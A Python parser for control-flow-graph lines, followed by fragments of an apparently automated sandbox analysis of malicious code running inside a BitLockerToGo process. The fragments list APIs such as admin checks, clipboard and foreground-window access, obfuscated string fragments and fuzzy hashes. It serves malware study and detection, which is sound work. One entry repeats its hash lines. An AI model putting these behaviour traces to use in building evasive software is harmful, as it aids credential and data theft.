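import re
from collections import deque
from dataclasses import dataclass, field

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
ADDR_RE = re.compile(r"^([0-9a-f]+)(?:-([0-9a-f]+))?$", re.IGNORECASE)


@dataclass
class Block:
    bid: int
    start: int
    end: int
    apis: list = field(default_factory=list)   # Windows APIs named in the block
    calls: list = field(default_factory=list)  # internal call targets, hex strings


def parse_cfg(text):
    """Return ({id: Block}, [(src, dst), ...]) for one control_flow_graph line."""
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks, edges, current, i = {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        if EDGE_RE.match(tok):
            src, dst = tok.split("->")
            edges.append((int(src), int(dst)))
        elif tok.isdigit() and ADDR_RE.match(nxt):
            lo, hi = ADDR_RE.match(nxt).groups()
            current = Block(int(tok), int(lo, 16), int(hi or lo, 16))
            blocks[current.bid] = current
            i += 1  # address token consumed
        elif current is None:
            raise ValueError(f"token {tok!r} appears before the first block")
        elif tok == "call" and nxt:
            current.calls.append(nxt)
            i += 1  # call target consumed
        else:
            current.apis.append(tok)
        i += 1
    return blocks, edges


def boundary_blocks(blocks, edges):
    """(entries, exits): blocks nothing else jumps to, and blocks that jump nowhere else.
    Self-loops are ignored so a looping entry or exit block still qualifies."""
    srcs = {s for s, d in edges if s != d}
    dsts = {d for s, d in edges if s != d}
    entries = sorted(b for b in blocks if b not in dsts)
    exits = sorted(b for b in blocks if b not in srcs)
    return entries, exits


def loop_blocks(edges):
    """Blocks that branch back to themselves: tight loops such as string decoders."""
    return sorted({s for s, d in edges if s == d})


def api_chain(blocks, edges, start):
    """Windows APIs in the order a breadth-first walk from `start` meets them."""
    succ = {}
    for s, d in edges:
        succ.setdefault(s, []).append(d)
    seen, queue, chain = {start}, deque([start]), []
    while queue:
        cur = queue.popleft()
        chain.extend(blocks[cur].apis)
        for d in succ.get(cur, []):
            if d not in seen:
                seen.add(d)
                queue.append(d)
    return chain


# Copied from this report's graph of the function at 0x40cd80 (the admin check).
ADMIN_CHECK_CFG = (
    "control_flow_graph 186 40cd80-40cd8e call 441280 189 40cd94-40cda1 IsUserAnAdmin call 439770 "
    "186->189 190 40cf6d-40cf6f ExitProcess 186->190 193 40cda7-40cdbe GetInputState 189->193 "
    "194 40cf68 call 442520 189->194 196 40cdc0-40cdd2 193->196 194->190 196->196 197 40cdd4-40cdfb "
    "GetCurrentThreadId GetCurrentProcessId 196->197 198 40ce00-40ce40 197->198 198->198 "
    "199 40ce42-40ce52 198->199 200 40ce60-40ce97 199->200 200->200 201 40ce99-40ce9b 200->201 "
    "202 40cefa-40cf15 201->202 203 40ce9d-40ceb6 201->203 205 40cf20-40cf53 202->205 "
    "204 40cec0-40cef8 203->204 204->202 204->204 205->205 206 40cf55-40cf5c call 40de50 205->206 "
    "206->194 209 40cf5e call 410ce0 206->209 211 40cf63 call 40f9f0 209->211 211->194"
)

if __name__ == "__main__":
    blocks, edges = parse_cfg(ADMIN_CHECK_CFG)
    entries, exits = boundary_blocks(blocks, edges)
    print(len(blocks), "blocks,", len(edges), "edges; entry", entries, "exit", exits, "loops", loop_blocks(edges))
    print("API chain from entry:", api_chain(blocks, edges, entries[0]))
```

Run against the 0x40cd80 graph, the walk finds one entry block (186), one exit block (190, the `ExitProcess` block that is reachable directly from the entry as well as through the `call 442520` block 194), five self-looping blocks, and the API order IsUserAnAdmin, ExitProcess, GetInputState, GetCurrentThreadId, GetCurrentProcessId, which is the same set the report lists in that function's API ID. The same parser applies unchanged to the other `control_flow_graph` lines in this section, including single-block graphs with no edges.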

                                                                                                                  Control-flow Graph

                                                                                                                  control_flow_graph 223 4432aa-4432b3 GetForegroundWindow call 445600 225 4432b8-4432d2 223->225
                                                                                                                  APIs
                                                                                                                  • GetForegroundWindow.USER32 ref: 004432AA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ForegroundWindow
                                                                                                                  • String ID: \K
                                                                                                                  • API String ID: 2020703349-3460819091
                                                                                                                  • Opcode ID: e2fea1834c0a78822f8131e5d29736a64dcd6fcb1f5446314925b7ac59144fd4
                                                                                                                  • Instruction ID: 063bc39e15748f4a6b5b4da385d0738b48dd980b00a938cc70d354eb2c792b30
                                                                                                                  • Opcode Fuzzy Hash: e2fea1834c0a78822f8131e5d29736a64dcd6fcb1f5446314925b7ac59144fd4
                                                                                                                  • Instruction Fuzzy Hash: 35D022BCF0811087EA00DB10EC0900A33149B8F3247428031D84953312CA306C1EC7C9

                                                                                                                  Control-flow Graph

                                                                                                                  control_flow_graph 301 442540-442554 302 4425c0-4425c9 call 43fa10 301->302 303 442569-442577 301->303 304 44255b-442562 301->304 305 4425cb-4425d4 call 43fad0 301->305 313 4425d9-4425dd 302->313 306 442580-4425a6 303->306 304->303 304->305 312 4425d6 305->312 306->306 310 4425a8-4425be RtlReAllocateHeap 306->310 310->312 312->313
                                                                                                                  APIs
                                                                                                                  • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000001,00000000,?,00000000,0042B55F,?,?), ref: 004425B8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1279760036-0
                                                                                                                  • Opcode ID: 8f67ff78f31ca39748cf45f1d831fdd455bc5a1e1b72e85ca22b83caa0179584
                                                                                                                  • Instruction ID: 3bba4366ca851911442764dbfc91f2820ba5381dd11dd892f8440e7a56c0e703
                                                                                                                  • Opcode Fuzzy Hash: 8f67ff78f31ca39748cf45f1d831fdd455bc5a1e1b72e85ca22b83caa0179584
                                                                                                                  • Instruction Fuzzy Hash: 02018EBA600301DBE3149F25FCB0927B759EB9A354F08443DF54683650D675980DD256

                                                                                                                  Control-flow Graph

                                                                                                                  control_flow_graph 314 43fad0-43fadf 315 43fae6-43faf9 314->315 316 43fb44-43fb48 314->316 317 43fb00-43fb30 315->317 317->317 318 43fb32-43fb3e RtlFreeHeap 317->318 318->316
                                                                                                                  APIs
                                                                                                                  • RtlFreeHeap.NTDLL(?,00000000,?), ref: 0043FB3E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3298025750-0
                                                                                                                  • Opcode ID: 923f309e1832be230594eba85964962d5c131df6e97af1b7e9130246d1ee294b
                                                                                                                  • Instruction ID: a241a5685252a34bf8753c4a36e4a80d628d1916c28273a4b5eb161b3b50b8c0
                                                                                                                  • Opcode Fuzzy Hash: 923f309e1832be230594eba85964962d5c131df6e97af1b7e9130246d1ee294b
                                                                                                                  • Instruction Fuzzy Hash: 03F04671D292608BD7049B38EE2465AB79A9FC6209F05817CD8C05F6D8C7344D66DE8B

                                                                                                                  Control-flow Graph

                                                                                                                  control_flow_graph 319 43c1e2-43c20e 320 43c210-43c222 319->320 320->320 321 43c224-43c248 SysAllocString 320->321 322 43c24c-43c24e 321->322
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocString
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2525500382-0
                                                                                                                  • Opcode ID: ceca2d0dcbe3f19ee7d2366c5e1cdf8af75e423c3cc94959c4c9a04e02c8a5b6
                                                                                                                  • Instruction ID: 0edef3b5fa914aaf0c4d58fd4414efa279be1f1b5fcd2aaaaa88f42ba277cb32
                                                                                                                  • Opcode Fuzzy Hash: ceca2d0dcbe3f19ee7d2366c5e1cdf8af75e423c3cc94959c4c9a04e02c8a5b6
                                                                                                                  • Instruction Fuzzy Hash: AF018C74110A41AFE3108F6AC444BA6BBF0FB9E310F508A58E5568BB51C7B5F852DFD0

                                                                                                                  Control-flow Graph

                                                                                                                  control_flow_graph 324 43c258-43c270 CoSetProxyBlanket
                                                                                                                  APIs
                                                                                                                  • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043C268
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: BlanketProxy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3890896728-0
                                                                                                                  • Opcode ID: c2ab398bce464029ae1143e04964b67ccca3b2c7882dac11a027af8e2bf7c4fe
                                                                                                                  • Instruction ID: 90214785a3c6bd59ab25897dc5d05d16556cf3df02cbc6e8bf56c323d76c7450
                                                                                                                  • Opcode Fuzzy Hash: c2ab398bce464029ae1143e04964b67ccca3b2c7882dac11a027af8e2bf7c4fe
                                                                                                                  • Instruction Fuzzy Hash: 84C001383E0302BAF2324B14AC1BF842624A746F02F202060B341BC0E08AE26A60AA09

                                                                                                                  Control-flow Graph

                                                                                                                  control_flow_graph 325 43fab2-43fac6 RtlAllocateHeap
                                                                                                                  APIs
                                                                                                                  • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 0043FAB9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1279760036-0
                                                                                                                  • Opcode ID: b15e10812584febcd0a50b8dfea056ba7e77aaa368a92f6e9d712b7b4028ab1f
                                                                                                                  • Instruction ID: 62b8da98c4e9c927b26d9646e5227c369ff2dec8b8e5acd4a8074fb57565bbf6
                                                                                                                  • Opcode Fuzzy Hash: b15e10812584febcd0a50b8dfea056ba7e77aaa368a92f6e9d712b7b4028ab1f
                                                                                                                  • Instruction Fuzzy Hash: 4EB092372A42059AE9101B99BC45B49B728EB8022BF104936F60884451816394294669
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $ $!$#$%$'$($)$+$,$-$/$/$1$1$3$3$4$5$7$7$7$9$9$;$=$=$?$A$A$B$C$E$G$I$K$K$M$M$N$N$O$P$P$U$Y$[$]$^$`$a$k$l$m$n$p$q$t$v$w$z$}$~
                                                                                                                  • API String ID: 0-3033080934
                                                                                                                  • Opcode ID: 9527aa7c6c163d55bd5c1723322880a53ab8ae9a105bdc3777b29beb39728b9a
                                                                                                                  • Instruction ID: bc0d86b789bb8b96a7cc1a38f1ddabbea94a259dec7e1919b431d61bf3f5abc8
                                                                                                                  • Opcode Fuzzy Hash: 9527aa7c6c163d55bd5c1723322880a53ab8ae9a105bdc3777b29beb39728b9a
                                                                                                                  • Instruction Fuzzy Hash: 71223E2190C7EA89DB32C63C8C487CDBE615B27224F0847D9D1F96B2D2D7B50A85CB66
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: "$"$%$)$*$,$0$0$1$1$2$7$8$:$<$<$=$>$@$A$C$G$I$I$K$M$O$S$W$w$z$|
                                                                                                                  • API String ID: 0-3015680060
                                                                                                                  • Opcode ID: 8bf6ac43211f0ced01c8085c9ff0e206bc1b6d4051f36b1960a1a1f2b6a318b1
                                                                                                                  • Instruction ID: 20cc0c7cefd14a6b4221435af9dcf42fe9c836e733c46325e5a10822d8806a0d
                                                                                                                  • Opcode Fuzzy Hash: 8bf6ac43211f0ced01c8085c9ff0e206bc1b6d4051f36b1960a1a1f2b6a318b1
                                                                                                                  • Instruction Fuzzy Hash: D2D1C231D087D98EDB22C6BC88083DDBFA15B66324F184399D4E96B3E2C3794946CB56
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: )S$Q$-$#>$E)[m$EXC^$Ew@u$J(Z$JBWG$VBB$ZZS\$Z^"N$_]
                                                                                                                  • API String ID: 0-732294183
                                                                                                                  • Opcode ID: 2c6b6dec1a3aeca8c0cde2012fb65f00d51253ab9b46e7028a77a8efb1de7235
                                                                                                                  • Instruction ID: 43c8bfd4d0ffc52c87cbebf0dc52430d854cff4809ba0d7369a45c1cdb2704fb
                                                                                                                  • Opcode Fuzzy Hash: 2c6b6dec1a3aeca8c0cde2012fb65f00d51253ab9b46e7028a77a8efb1de7235
                                                                                                                  • Instruction Fuzzy Hash: 9A232771604B818FE3258F35C4607A3BBE2EF96304F18996EC0EB8B792D779A405CB55
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                  • String ID: <$F$G$]$c
                                                                                                                  • API String ID: 2832541153-1818401840
                                                                                                                  • Opcode ID: 5290a97ecd0775b6401821c6e7be433f94010b661b7b8b225101acbd93d1f163
                                                                                                                  • Instruction ID: 86b6270dbdddb5e9962f20051e2dfdb3068328bc0b9f684ec1422ae9638b5b2e
                                                                                                                  • Opcode Fuzzy Hash: 5290a97ecd0775b6401821c6e7be433f94010b661b7b8b225101acbd93d1f163
                                                                                                                  • Instruction Fuzzy Hash: DA41C27150C3828ED301AF7CD44836FBFE05B9A324F058A2EE5D5873D1D678854987AB
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: MetricsSystem
                                                                                                                  • String ID: $ yC$+}C$;~C$DyC$O}C$cxC$kzC
                                                                                                                  • API String ID: 4116985748-4279269959
                                                                                                                  • Opcode ID: 62a666965452f5991cf9a04505432304e1f1cbef11720978f5838b7a7d0cd7e0
                                                                                                                  • Instruction ID: 87ccb182078abfdf045ea6081c633fa90ea4dbde24179ff630f0f79226f70ea9
                                                                                                                  • Opcode Fuzzy Hash: 62a666965452f5991cf9a04505432304e1f1cbef11720978f5838b7a7d0cd7e0
                                                                                                                  • Instruction Fuzzy Hash: EED117B49093808BE7B0DF15C588B9FBBF0BB85348F108A1EE5D94B254D7B85598CB4B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $0ONM$8$9:;4$@_^e$lkji$rM$xwv-$|-[b$|{zy$usZ$
                                                                                                                  • API String ID: 0-3994231490
                                                                                                                  • Opcode ID: ec1d6f27a190a20f1aa7ba43da139ff415c008c75ce141617656b0070c99a0f0
                                                                                                                  • Instruction ID: 6fad7d84e2efd6fec4561277c4c20d8c72665fb25a47927a94e0f2c33ff226fc
                                                                                                                  • Opcode Fuzzy Hash: ec1d6f27a190a20f1aa7ba43da139ff415c008c75ce141617656b0070c99a0f0
                                                                                                                  • Instruction Fuzzy Hash: 1CA2117020C3918BD724CF29D4907ABBBE2EFE6304F58896DE4C58B392D7788545CB96
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: UB$OB$9MB$GOB$GTB$eSB$jTB$pOB${RB
                                                                                                                  • API String ID: 0-3236151770
                                                                                                                  • Opcode ID: d673b7c42c8ee394b6f5a61ea78a5438d9ff89b3face7e0a3ea1da0b3fd18ed5
                                                                                                                  • Instruction ID: 8547444d356b2edf2a5589af1f8df7404c8b6a2043747b9cbcbc9635f5e71319
                                                                                                                  • Opcode Fuzzy Hash: d673b7c42c8ee394b6f5a61ea78a5438d9ff89b3face7e0a3ea1da0b3fd18ed5
                                                                                                                  • Instruction Fuzzy Hash: 9A728DB0509F818ED3668B3C9849793BFD59B6A324F084A5EE0FE8B3D2C7756101C766
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$@$gfff$gfff$gfff
                                                                                                                  • API String ID: 0-2517803157
                                                                                                                  • Opcode ID: d152c204e7b30029da98014d98c16f61d2cd7a21374bb6e99806c66b45573a0f
                                                                                                                  • Instruction ID: b7b7424dd41788c4f5bd300ad1c28beee6fe6829a1e2288f34b088ad8562c2fc
                                                                                                                  • Opcode Fuzzy Hash: d152c204e7b30029da98014d98c16f61d2cd7a21374bb6e99806c66b45573a0f
                                                                                                                  • Instruction Fuzzy Hash: 57D2D0716083418FD714CF29C48476BBBE2AF89304F188A3EE499AB3D1D779D945CB86
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: .[6$RA$ZPZi$~d~c$~$
                                                                                                                  • API String ID: 0-4246915511
                                                                                                                  • Opcode ID: 8a876640d93e3db8f478919f90ceb5779d35d44dd2e6367ed19de8d9becafda2
                                                                                                                  • Instruction ID: f26921d1b774c1171388e809b27ab1d8db0597545e4c44ea9a679c2bcf3fb156
                                                                                                                  • Opcode Fuzzy Hash: 8a876640d93e3db8f478919f90ceb5779d35d44dd2e6367ed19de8d9becafda2
                                                                                                                  • Instruction Fuzzy Hash: 6F8236B5909340DBD720CF25D891BABB7E1FF85304F084A3EE88997391E7399845CB5A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 0$0$0$@$d$i
                                                                                                                  • API String ID: 0-2683514064
                                                                                                                  • Opcode ID: 84e80e362cb28152ed66a849b45e0140097f4ba56a0b06fea32ea5d2e879a5b0
                                                                                                                  • Instruction ID: 512d34ccc82a77e582c652336fe38cdedd01620c8fe1c1faa7ca20eaba561f11
                                                                                                                  • Opcode Fuzzy Hash: 84e80e362cb28152ed66a849b45e0140097f4ba56a0b06fea32ea5d2e879a5b0
                                                                                                                  • Instruction Fuzzy Hash: 6672D27160C3418BD719CF28C69476BBBE1AB89304F14897EE8C5A73D1D3B8D945CB86
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: +$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff$gfff
                                                                                                                  • API String ID: 0-925659942
                                                                                                                  • Opcode ID: 8427058d751187ff01546108bd99107437b7f22f2a0a8ca23830413179c520ad
                                                                                                                  • Instruction ID: a94ae675887b7b03491fb6eb80606b310f5e3cb8700f3d4feda2a12fc40df389
                                                                                                                  • Opcode Fuzzy Hash: 8427058d751187ff01546108bd99107437b7f22f2a0a8ca23830413179c520ad
                                                                                                                  • Instruction Fuzzy Hash: FFF1817060C3828BC718CE29C59466FBBE2AFD9304F188A3EE495A73D1D778D945CB46
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff$gfff
                                                                                                                  • API String ID: 0-854689426
                                                                                                                  • Opcode ID: f379f27dd95fc4024c2e4158d430724ef6ebea1463502d6f1c60e9f9be2936e4
                                                                                                                  • Instruction ID: 7bf8a449e51c73537fa547982d22261e868c7bc354e849baa76ce27a9e5437c2
                                                                                                                  • Opcode Fuzzy Hash: f379f27dd95fc4024c2e4158d430724ef6ebea1463502d6f1c60e9f9be2936e4
                                                                                                                  • Instruction Fuzzy Hash: FDE1B47060C7828FC719CE29C59026AFBE2AFD9304F088A6EE4D5973D2D778D905CB46
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: AKKD$FOYC$No$QBYF$]_#"$}#
                                                                                                                  • API String ID: 0-3146139966
                                                                                                                  • Opcode ID: 5f1ffba9f1033bf396acbbb8aab2a2ea65e55524da9d3b6b5d8213ca2750a204
                                                                                                                  • Instruction ID: db70b59a852bfcba8b1849055af727ae04cd91f75e39da84bfcef201b843e50f
                                                                                                                  • Opcode Fuzzy Hash: 5f1ffba9f1033bf396acbbb8aab2a2ea65e55524da9d3b6b5d8213ca2750a204
                                                                                                                  • Instruction ID: 8589f4b93a998868114f223be7af651f505e9e730e50a6b1ccb8af2b7f0d31d5
                                                                                                                  • Opcode Fuzzy Hash: 6954f0e74a105458b55d302594fc904d2380914e8ead8369d6159b6911f031fe
                                                                                                                  • Instruction Fuzzy Hash: 041246B5E00214CFCF14CFA9D8826AEBBB1FF55314F1841A9E845AB392D7399D01CB98
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: "RD$\ND
                                                                                                                  • API String ID: 0-2093393921
                                                                                                                  • Opcode ID: adf512957d84d4cf8b8f189be333a95e9778c5d7d228dffb59c0be1092d83611
                                                                                                                  • Instruction ID: da9220c6e1174317c4111917ac9d46df9afd4fbc859c5c841897490ddf909bd5
                                                                                                                  • Opcode Fuzzy Hash: adf512957d84d4cf8b8f189be333a95e9778c5d7d228dffb59c0be1092d83611
                                                                                                                  • Instruction Fuzzy Hash: 2E022335A09215CFDB08CF28D8A06AEB7E2FF89315F1A857DD84697352D738E911CB84
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID: $
                                                                                                                  • API String ID: 2994545307-1425349742
                                                                                                                  • Opcode ID: bda960a75d46c5a6fc9d5fe3249d19a5ec2dd75b80d1f6525b744beddf1b34e1
                                                                                                                  • Instruction ID: c4360625503617542969dcb1a8dc174e59d305d23cbff731b3d34fafdd4a4b8f
                                                                                                                  • Opcode Fuzzy Hash: bda960a75d46c5a6fc9d5fe3249d19a5ec2dd75b80d1f6525b744beddf1b34e1
                                                                                                                  • Instruction Fuzzy Hash: E912CFB17083509BEB30CF11E841BABB7F2FBC4715F54892EE58997280D778A901CB5A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID: f$
                                                                                                                  • API String ID: 2994545307-508322865
                                                                                                                  • Opcode ID: 506eec650a7e683151291a75bace8e38032bc7d3d431c0ed8e0fdf087f8987fa
                                                                                                                  • Instruction ID: cf7913528af932525df29018c7e9a92b13501a7b8df9cc2de72caf012cab3203
                                                                                                                  • Opcode Fuzzy Hash: 506eec650a7e683151291a75bace8e38032bc7d3d431c0ed8e0fdf087f8987fa
                                                                                                                  • Instruction Fuzzy Hash: DE12D2716083019FE714CF24C890B6BBBE5EFC4324F188A2EE69587391D738E855CB96
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: "$"
                                                                                                                  • API String ID: 0-3758156766
                                                                                                                  • Opcode ID: 754eff2a203b1f2999262ef63289dc97fc84d87b7793b8ed974992b704871ebb
                                                                                                                  • Instruction ID: 027281265db9bd885d198bbd6faf2ebbc5f8f39600461de4268311c776c3208f
                                                                                                                  • Opcode Fuzzy Hash: 754eff2a203b1f2999262ef63289dc97fc84d87b7793b8ed974992b704871ebb
